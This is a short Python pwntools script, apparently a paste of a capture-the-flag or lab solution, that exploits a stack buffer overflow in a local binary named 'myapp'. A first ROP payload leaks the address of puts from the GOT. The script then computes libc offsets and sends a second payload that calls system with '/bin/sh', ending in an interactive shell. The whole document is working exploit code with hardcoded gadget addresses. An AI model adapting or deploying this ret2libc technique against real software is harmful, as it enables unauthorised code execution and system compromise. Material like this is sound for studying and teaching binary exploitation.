from pwn import *# Here we define the context of the exploit, it is for linux

1. from pwn import *
2. # Here we define the context of the exploit, it is for linux os and amd64 archeticture
3. context(os='linux', arch='amd64')
4. put_plt_addr = p64(0x401030)
5. put_got_addr = p64(0x404018)
6. main_plt_addr = p64(0x401094)
7. pop_rdi_gadget = p64(0x401090)
8.  
9. junk = 'A'*120
10. payload = junk
11. payload += pop_rdi_gadget
12. payload += put_got_addr
13. payload += put_plt_addr
14. payload += main_plt_addr
15. #print(payload)
16.  
17. p = process("./myapp")
18. print(p.recvuntil("back?"))
19. #print(p.recv())
20. #print(p.recv())
21. #print(p.recv())
22. p.sendline(payload)
23. p.recvuntil("\n")
24. leaked = p.recv()[:8].strip().ljust(8, "\x00")
25. log.success("Leaked Address = " +str(leaked))
26.  
27. leaked = u64(leaked)
28.  
29. puts_libc = 0x71910
30. system_libc = 0x449c0
31. sh_libc = 0x181519
32. offset = leaked - puts_libc # offset between any function in the program and its address in libc
33. sys = p64(offset+system_libc)
34. sh = p64(offset+sh_libc)
35.  
36.  
37. payload2 = junk
38. payload2 += pop_rdi_gadget
39. payload2 += sh
40. payload2 += sys
41.  
42.  
43. p.recvuntil("back?")
44. p.sendline(payload2)
45.  
46. p.interactive()